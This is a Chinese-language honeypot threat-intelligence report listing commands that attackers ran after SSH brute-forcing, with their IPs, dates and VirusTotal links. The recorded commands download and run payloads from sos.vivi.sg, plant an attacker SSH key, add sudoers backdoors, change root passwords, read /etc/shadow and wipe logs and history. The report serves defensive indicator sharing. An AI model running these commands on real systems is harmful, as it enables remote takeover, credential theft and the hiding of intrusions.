简述

该报告整理了elkeid 蜜罐收集的ssh暴破后,攻击行为及其关联IOC的整理

关键词:

ifjeeisurofmioufiose

时间

20220530

IP

179.43.167.75

执行命令

bash -c sudo hive-passwd set ifjeeisurofmioufiose; sudo hive-passwd ifjeeisurofmioufiose; pkill Xorg; pkill x11vnc; pkill Hello; systemctl stop shellinabox; history -c; cat /hive-config/rig.conf; uname -a

关联情报

https://www.virustotal.com/gui/ip-address/179.43.167.75

https://threat.gg/attackers/49393300-3dc3-4185-a004-d41e761fe492

关键词:

finalshell_separator

时间

20221128

IP

107.189.7.193

执行命令

bash -c export LANG=en_US;export LANGUAGE=en_US;export LC_ALL=en_US;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;sleep 1;free;echo finalshell_separator;uptime;echo finalshell_separator;cat /proc/net/dev;echo finalshell_separator;df;echo finalshell_separator;

关联情报

https://www.virustotal.com/gui/url/347ec978ed27fc947fbe5d6f051b45a85f08acfee1d0d3f8d9e7d0b502a64934

关键词:

wtmp.honeypot,secscan

时间

20221103

IP

182.150.22.222

执行命令

/bin/bash -c echo secscan:secscan | chpasswd (新建用户)

pam_tally2 secscan

/usr/sbin/rsyslogd -n -iNONE

bash -c sd report|grep "Data center"|awk '{print $3}'

chmod 777 i686

./i686 server

mv /var/log/wtmp /var/log/wtmp.honeypot

参考链接

https://www.virustotal.com/gui/url/4f33bb16afb6b7942dc61cd6250c68cc242cff18310a99d15bb8f5a3041cfc36/detection

关键词:

alternatives,[Mm]iner

时间

20221203

IP

36.110.228.254

执行命令

bash -c ps | grep [Mm]iner

tar -df alternatives.tar.0 -C /var/lib/dpkg alternatives

bash -c cat /proc/cpuinfo (收集系统信息)

ls -la /dev/ttyGSM* /dev/ttyUSB-mod* /var/spool/sms/* /var/log/smsd.log /etc/smsd.conf* /usr/bin/qmuxd /var/qmux_connect_socket /etc/config/simman /dev/modem* /var/config/sms/*

其中ps进程树如下,似乎存在异常?

|1054.0 bash -c ps | grep [Mm]iner (ppid_argv:/usr/sbin/sshd -D )                          
|-1055.0 ps
|--1057.0 ps.original
|---1064.0 service crond start
|---1062.0 pkill -9 32678
|---1063.0 sh -c /etc/32678&
|---1066.0 /root/ps.original
|--1058.0 grep -v zzh|pnscan
|-1056.0 grep [Mm]iner

参考链接

https://www.virustotal.com/gui/url/75cbd6ad081bdc9cd0c66c115d44a5fc8c5366626f485a8e09fa6b4d12d68a24

关键词:

ns3.jpg,oto,sos.vivi.sg

时间

20220801

IP

45.64.130.149

执行命令

bash -c uname -a;id;cat /etc/shadow /etc/passwd;lscpu;

echo daemon ALL=(ALL) NOPASSWD: ALL >> /etc/sudoers;chsh -s /bin/sh daemon;

echo Password123 |passwd daemon --stdin;

chattr -ia /root/.ssh/ ;

wget http://sos.vivi.sg/ns1.jpg -O ~/.ssh/authorized_keys;(写入认证密钥)

chmod 600 ~/.ssh/authorized_keys;wget -qO - http://sos.vivi.sg/ns2.jpg|perl;(执行)

wget http://sos.vivi.sg/ns3.jpg -O /tmp/x;chmod +x /tmp/x;/tmp/x;mv /tmp/x /tmp/o;/tmp/o;rm -f /tmp/o;

mkdir /sbin/.ssh;cp ~/.ssh/authorized_keys /sbin/.ssh;(保存修改后的密钥)

chown daemon.daemon /sbin/.ssh /sbin/.ssh/;chmod 700 /sbin/.ssh;chmod 600 /sbin/.ssh/authorized_keys;

wget http://sos.vivi.sg/oto -O /etc/oto;chmod 755 /tmp/oto;/tmp/oto;curl http://sos.vivi.sg/oto -o /tmp/oto;chmod 755 /tmp/oto;/tmp/oto;rm -f /tmp/oto (执行并清除痕迹)

参考链接

  • 45.64.130.149

https://www.virustotal.com/gui/url/45e78bf413d5dcc2fbb8711f5d47cb41f6fe2e7826f5a147690000abf8632801

  • http://sos.vivi.sg

https://www.virustotal.com/gui/url/98b904c279e990009d48b50527eb1f726f7f6b30a3632d43b7c37b4a0326d768

关键词:

q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu

时间

20220808

IP

137.184.228.225

执行命令

bash -c echo -e q(&%^#$SHH?M?A-k3f49!^ZaTk?leSH@q!@#D0\nS97pp7fcZ1qu\nS97pp7fcZ1qu|passwd|bash

参考链接

  • 137.184.228.225

https://www.virustotal.com/gui/url/921ef4be53465a028e26cf7edc4e3bdc84fef4f28fe78215a4de0c979e274f06

关键词: games, x

时间

20230212

IP

173.244.55.81

执行命令

  • mkdir games
  • adduser x
  • /sbin/groupadd -g 1001 x
  • touch /var/run/utm
  • cat /proc/cpuinfo
  • rm -rf /var/run/utmp
  • touch /root/.bash_history
  • touch /var/log/wtmp
  • rm -rf /var/log/wtmp
  • rm -rf /root/.bash_history
  • sh -c cd /etc/skel; find . -print

参考链接

关键词:BC20mxv7lX91

时间

20230103

IP

186.6.226.172

执行命令

  • 删除.ssh并写入密钥

bash -c cd ~ && rm -rf .ssh && mkdir .ssh && echo ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr>>.ssh/authorized_keys && chmod -R go= /.ssh && cd

  • 更改密码

bash -c echo root:BC20mxv7lX91|chpasswd|bash